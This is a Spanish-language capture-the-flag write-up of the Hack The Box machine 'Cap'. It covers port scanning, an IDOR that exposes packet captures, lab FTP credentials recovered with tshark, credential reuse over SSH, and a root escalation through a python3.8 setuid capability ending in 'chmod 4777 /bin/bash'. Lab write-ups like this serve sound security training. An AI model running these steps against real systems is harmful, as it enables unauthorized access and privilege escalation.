HTB - Cap | (Difficulty Easy) - Linux

Writeup de la máquina de dificultad fácil Cap de la página https://hackthebox.eu

Publicado 17/01/2025 Actualizado 04/02/2025

Por ju4ncaa

9 min de lectura

HTB - Cap | (Difficulty Easy) - Linux

Useful Skills

Web enumeration
Insecure Direct Object Reference (IDOR)
PCAP capture analysis (tshark)
Information Lekeage
Credentials Reuse
Abusing capabilities (/usr/bin/python3.8)

Enumeration

TCP Scan

  
rustscan -a 10.10.10.245 --ulimit 5000 -g
10.10.10.245 -> [22,21,80]

  
nmap -p22,21,80 -sCV 10.10.10.245 -oN tcpScan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-17 17:05 CET
Nmap scan report for 10.10.10.245
Host is up (0.035s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
|_http-title: Security Dashboard
|_http-server-header: gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Fri, 17 Jan 2025 16:06:23 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Fri, 17 Jan 2025 16:06:16 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Fri, 17 Jan 2025 16:06:16 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, HEAD, OPTIONS
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=1/17%Time=678A7FD8%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,4C56,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\
SF:x20Fri,\x2017\x20Jan\x202025\x2016:06:16\x20GMT\r\nConnection:\x20close
SF:\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20
SF:19386\r\n\r\n<!DOCTYPE\x20html>\n<html\x20class=\"no-js\"\x20lang=\"en\
SF:">\n\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20
SF:\x20<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x
SF:20\x20\x20\x20<title>Security\x20Dashboard</title>\n\x20\x20\x20\x20<me
SF:ta\x20name=\"viewport\"\x20content=\"width=device-width,\x20initial-sca
SF:le=1\">\n\x20\x20\x20\x20<link\x20rel=\"shortcut\x20icon\"\x20type=\"im
SF:age/png\"\x20href=\"/static/images/icon/favicon\.ico\">\n\x20\x20\x20\x
SF:20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/bootstrap\.min\.css
SF:\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/
SF:font-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\
SF:x20href=\"/static/css/themify-icons\.css\">\n\x20\x20\x20\x20<link\x20r
SF:el=\"stylesheet\"\x20href=\"/static/css/metisMenu\.css\">\n\x20\x20\x20
SF:\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/owl\.carousel\.mi
SF:n\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/stati
SF:c/css/slicknav\.min\.css\">\n\x20\x20\x20\x20<!--\x20amchar")%r(HTTPOpt
SF:ions,B3,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20Fri,
SF:\x2017\x20Jan\x202025\x2016:06:16\x20GMT\r\nConnection:\x20close\r\nCon
SF:tent-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20GET,\x20HEAD,\x2
SF:0OPTIONS\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,121,"HTTP/1\.1
SF:\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-Type:\x20t
SF:ext/html\r\nContent-Length:\x20196\r\n\r\n<html>\n\x20\x20<head>\n\x20\
SF:x20\x20\x20<title>Bad\x20Request</title>\n\x20\x20</head>\n\x20\x20<bod
SF:y>\n\x20\x20\x20\x20<h1><p>Bad\x20Request</p></h1>\n\x20\x20\x20\x20Inv
SF:alid\x20HTTP\x20Version\x20&#x27;Invalid\x20HTTP\x20Version:\x20&#x27;R
SF:TSP/1\.0&#x27;&#x27;\n\x20\x20</body>\n</html>\n")%r(FourOhFourRequest,
SF:189,"HTTP/1\.0\x20404\x20NOT\x20FOUND\r\nServer:\x20gunicorn\r\nDate:\x
SF:20Fri,\x2017\x20Jan\x202025\x2016:06:23\x20GMT\r\nConnection:\x20close\
SF:r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x202
SF:32\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x203\.2\
SF:x20Final//EN\">\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</
SF:h1>\n<p>The\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20
SF:server\.\x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x2
SF:0check\x20your\x20spelling\x20and\x20try\x20again\.</p>\n");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.61 seconds

UDP Scan

  
nmap -sU --top-ports 1500 --min-rate 5000 -n -Pn 10.10.10.245 -oN udpScan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-17 17:17 CET
Nmap scan report for 10.10.10.245
Host is up (0.035s latency).
Not shown: 1494 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
207/udp   closed at-7
19315/udp closed keyshadow
20445/udp closed unknown
21366/udp closed unknown
28190/udp closed unknown
49197/udp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 0.88 seconds

FTP Enumeration

En el puerto 21/TCP encuentro un servidor FTP con la versión vsftpd 3.0.3, en principio no dipongo de anonymous login.

Sabiendo que es la versión de FTP es vsftpd 3.0.3 puedo buscar información sobre posibles vulnerabilidades existentes

Busco vulnerabilidades sobre vsftpd 3.0.3 pero lo mas interesante que encuentro es una Denegación de servicio

vsftpd 3.0.3 - Remote Denial of Service

HTTP Enumeration

Whatweb reporta una versión de JQuery desactualizada, el titulo que indica que es un panel de seguridad y un servidor HTTP gunicorn

whatweb http://10.10.10.245
http://10.10.10.245 [200 OK] Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[gunicorn], IP[10.10.10.245], JQuery[2.2.4], Modernizr[2.8.3.min], Script, Title[Security Dashboard], X-UA-Compatible[ie=edge]

Accediendo a la página http://10.10.10.245 puedo observar un panel de seguridad de monitoreo donde se recogen eventos de seguridad escaneos de puertos entre otros

Exploitation

IDOR (Insecure Direct Object Reference)

Accedo al apartado del navbar llamado Security Snapshot (5 Second PCAP + Analysis)

En la URL observo /data/19 puede que existan mas recursos como 0,1,2,3…

Intento acceder a diferentes numeros como el 0,1,2,3…, al acceder al 0 la información cambia, esto me indica que estoy ante IDOR ya que se me está permitiendo acceder directamente a diferentes recursos e información

Descargo la captura pcap y la analizo con tshark filtrando solamente por paquetes que involucren el protocolo FTP, consigo dar con una credenciales nathan:Buck3tH4TF0RM3!

  
tshark -r 0.pcap -Y "ftp"
Running as user "root" and group "root". This could be dangerous.
 2.626895 192.168.196.16 → 192.168.196.1 FTP 76 Response: 220 (vsFTPd 3.0.3)
 4.126500 192.168.196.1 → 192.168.196.16 FTP 69 Request: USER nathan
 4.126630 192.168.196.16 → 192.168.196.1 FTP 90 Response: 331 Please specify the password.
 5.424998 192.168.196.1 → 192.168.196.16 FTP 78 Request: PASS Buck3tH4TF0RM3!
 5.432387 192.168.196.16 → 192.168.196.1 FTP 79 Response: 230 Login successful.
 5.432801 192.168.196.1 → 192.168.196.16 FTP 62 Request: SYST
 5.432937 192.168.196.16 → 192.168.196.1 FTP 75 Response: 215 UNIX Type: L8
 6.309628 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,140
 6.309874 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
 6.310514 192.168.196.1 → 192.168.196.16 FTP 62 Request: LIST
 6.311053 192.168.196.16 → 192.168.196.1 FTP 95 Response: 150 Here comes the directory listing.
 6.311479 192.168.196.16 → 192.168.196.1 FTP 80 Response: 226 Directory send OK.
 7.380771 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,141
 7.380998 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
 7.381554 192.168.196.1 → 192.168.196.16 FTP 66 Request: LIST -al
 7.382165 192.168.196.16 → 192.168.196.1 FTP 95 Response: 150 Here comes the directory listing.
 7.382504 192.168.196.16 → 192.168.196.1 FTP 80 Response: 226 Directory send OK.
28.031068 192.168.196.1 → 192.168.196.16 FTP 64 Request: TYPE I
28.031221 192.168.196.16 → 192.168.196.1 FTP 87 Response: 200 Switching to Binary mode.
28.031547 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,143
28.031688 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
28.031932 192.168.196.1 → 192.168.196.16 FTP 72 Request: RETR notes.txt
28.032072 192.168.196.16 → 192.168.196.1 FTP 82 Response: 550 Failed to open file.
31.127551 192.168.196.1 → 192.168.196.16 FTP 62 Request: QUIT
31.127652 192.168.196.16 → 192.168.196.1 FTP 70 Response: 221 Goodbye.

Accedo por FTP como el usuario nathan y la contraseña Buck3tH4TF0RM3!

  
ftp 10.10.10.245
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:juanca): nathan
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Utilizo pwd para ver donde me encuentro, veo que en el directorio personal de nathan donde se encuentra la flag de usuario y un archivo llamado privesc

  
ftp 10.10.10.245
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:juanca): nathan
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /home/nathan

  
ftp> dir
229 Entering Extended Passive Mode (|||30530|)
150 Here comes the directory listing.
-rw-rw-r--    1 1001     1001           46 Jan 17 20:52 privesc
-r--------    1 1001     1001           33 Jan 17 19:43 user.txt
226 Directory send

Intento acceder con el mismo usuario y contraseña por ssh, pudiendo obtener acceso sin problema debido a la reutilización de contraseñas

ssh nathan@10.10.10.245
nathan@10.10.10.245's password:
nathan@cap:~$ whoami
nathan

Post exploitation

Privilege escalation

Obtengo acceso al sistema como el usuario nathan, un usuario de bajos privilegios por lo que debo de buscar alguna manera de escalar mis privilegios y convertirme en root

  
nathan@cap:~$ grep sh$ /etc/passwd
root:x:0:0:root:/root:/bin/bash
nathan:x:1001:1001::/home/nathan:/bin/bash

Recuerdo que en el directorio home de nathan existe un archivo llamado privesc el cual nos he descargado con ftp, por lo que lo inspecciono y observo un pequeño codigo en Python el cual importa la librería os, establece el UID de usuario a 0 (root) y otorga permisos SUID al binario /bin/bash

  
nathan@cap:~$ cat privesc 
import os
os.setuid(0)
os.system("/bin/bash")

Analizo los permisos SUID del sistema, pero no encuentro nada de interés

  
nathan@cap:~$ find / -perm -4000 2>/dev/null | grep -v /snap*
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/at
/usr/bin/chsh
/usr/bin/su
/usr/bin/fusermount
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

Analizo las capabilities del sistema y observo que se encuentra Python3.8

  
nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+

Las capabilities permiten a un proceso ejecutar acciones que normalmente solo podría realizar el usuario (root), pero sin otorgar todos los privilegios de root, esto permite que un proceso tenga ciertos privilegios elevados. Al poder ejecutar Python con privilegios elevados puedo cambiar el UID de mi usuario y establecerlo a 0 (root) y otorgar permisos SUID al binario /bin/bash al igual que se realizaba en el archivo privesc del usuario personal de nathan.

  
nathan@cap:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("chmod 4777 /bin/bash")'
nathan@cap:~$ ls -l /bin/bash
-rwsrwxrwx 1 root root 1183448 Jun 18  2020 /bin/bash
nathan@cap:~$ bash -p
bash-5.0# whoami
root

Writeup, Hack the Box

Esta entrada está licenciada bajo CC BY 4.0 por el autor.